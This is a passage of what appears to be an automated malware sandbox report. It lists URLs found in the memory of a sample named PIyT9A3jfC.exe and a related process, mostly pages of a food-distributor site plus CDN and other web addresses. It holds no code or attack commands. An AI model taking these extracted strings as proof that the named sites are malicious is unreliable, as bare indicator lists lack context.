                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.799425156.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/comments/feed/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/contact/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/employment-opportunities/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.799425156.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/feed/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/flyers/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/news/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/order/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/our-team/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/privacy-policy/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/product-catalog
                  Source: PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/product-catalog/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/service-area/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/vendors/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.799425156.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/wp-content/uploads/LogoNEW-250x129.jpg
                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.799425156.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/wp-content/uploads/P-48x48.gif
                  Source: PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/wp-content/uploads/P.gif
                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.799425156.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/wp-content/uploads/elementor/thumbs/facebook-512-q1jbn3nkxzlg1s7t64rdmt1lwqmyqc
                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.799425156.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/wp-content/uploads/elementor/thumbs/in-q1jbnt182ik6r96y1xqb04n1y55vi627ix9trmwf
                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.799425156.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/wp-content/uploads/iStock-1031193710b.jpg
                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.799425156.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/wp-content/uploads/iStock-1163123914b.jpg
                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.799425156.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/wp-content/uploads/iStock-516652802b.jpg
                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.799425156.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/wp-content/uploads/iStock-926365420b.jpg
                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.799425156.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/wp-content/uploads/monthlyspec.png
                  Source: PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/wp-content/uploads/pohl-14.jpg
                  Source: PIyT9A3jfC.exe, 00000001.00000003.714841483.00000000013DC000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.702274857.00000000013DC000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.799425156.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/wp-json/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.799425156.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fpohlfood.com%2F
                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.799425156.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fpohlfood.com%2F&#038;format=xml
                  Source: PIyT9A3jfC.exe, 00000001.00000003.714841483.00000000013DC000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.702274857.00000000013DC000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.799425156.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/wp-json/wp/v2/pages/158
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://s.rankmath.com/home
                  Source: pigalicapi.exe, 00000003.00000003.669232158.0000000004E30000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://schema.org
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sekcija-simer.gzs.si/vsebina/O-sekciji-SiMER
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.588777169.0000000008000000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.596668740.0000000004000000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sjbs.org/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css?ver=1.0.0
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js?ver=1.0.0
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.588156336.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.586890411.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.586479452.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.587455999.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, 